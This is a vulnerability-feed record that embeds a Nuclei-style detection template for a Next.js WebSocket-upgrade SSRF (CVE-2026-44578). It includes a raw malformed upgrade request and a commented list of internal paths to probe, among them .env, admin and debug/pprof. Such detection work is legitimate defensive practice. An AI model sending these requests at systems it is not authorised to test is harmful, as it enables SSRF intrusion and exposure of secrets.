{"uuid": "70e7de3e-365c-4bc6-bc42-e5d33f01458b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-44578", "type": "seen", "source": "https://gist.github.com/hahwul/e82a1e91f75872e43287743d4a15d035", "content": "id: nextjs-websocket-upgrade-ssrf-ghsa-c4j6\n\ninfo:\n  name: Next.js WebSocket Upgrade SSRF (GHSA-c4j6-fc7j-m34r / CVE-2026-44578)\n  author: hahwul\n  severity: high\n  description: |\n    Detects Next.js instances vulnerable to SSRF via malformed WebSocket upgrade\n    request with absolute-form request-URI (http:///).\n\n    The vulnerable resolveRoutes + upgrade handler collapses // and proxies to\n    localhost:80/443. Response starting with \"HTTP/1.\" or containing\n    \"Internal Server Error\" indicates the SSRF path was triggered.\n\n    Affected versions: next >=13.4.13 <15.5.16, >=16.0.0 <16.2.5\n\n    Note: Front-end proxies (nginx/Apache/CDN) may return similar errors\n    for absolute-URI requests, causing false positives.\n    Use the original Python verifier (verify_ghsa_c4j6.py) with control probe\n    for accurate in-band confirmation.\n  reference:\n    - https://github.com/vercel/next.js/security/advisories/GHSA-c4j6-fc7j-m34r\n  tags: cve,cve2026,nextjs,ssrf,websocket,intrusive\n\nvariables:\n  # Default test path (override with -var path=xxx if needed)\n  path: \"x\"\n\nrequests:\n  - raw:\n      - |\n        GET http:///{{path}} HTTP/1.1\n        Host: {{Hostname}}\n        Connection: Upgrade\n        Upgrade: websocket\n        Sec-WebSocket-Version: 13\n        Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==\n\n    # To test several paths at once, uncomment the payloads block below\n    # payloads:\n    #   path:\n    #     - x\n    #     - \"\"\n    #     - healthz\n    #     - status\n    #     - metrics\n    #     - actuator/health\n    #     - admin\n    #     - .env\n    #     - server-status\n    #     - stub_status\n    #     - nginx_status\n    #     - wp-login.php\n    #     - api/v1\n    #     - debug/pprof\n    #     - _next/static\n\n    matchers:\n      - type: regex\n        regex:\n          - '^HTTP/1\\.[0-9] '\n        part: raw\n      - type: word\n        words:\n          - \"Internal Server Error\"\n        part: body\n    matchers-condition: or\n\n    redirects: false\n    max-redirects: 0\n    threads: 10", "creation_timestamp": "2026-05-15T00:16:17.000000Z"}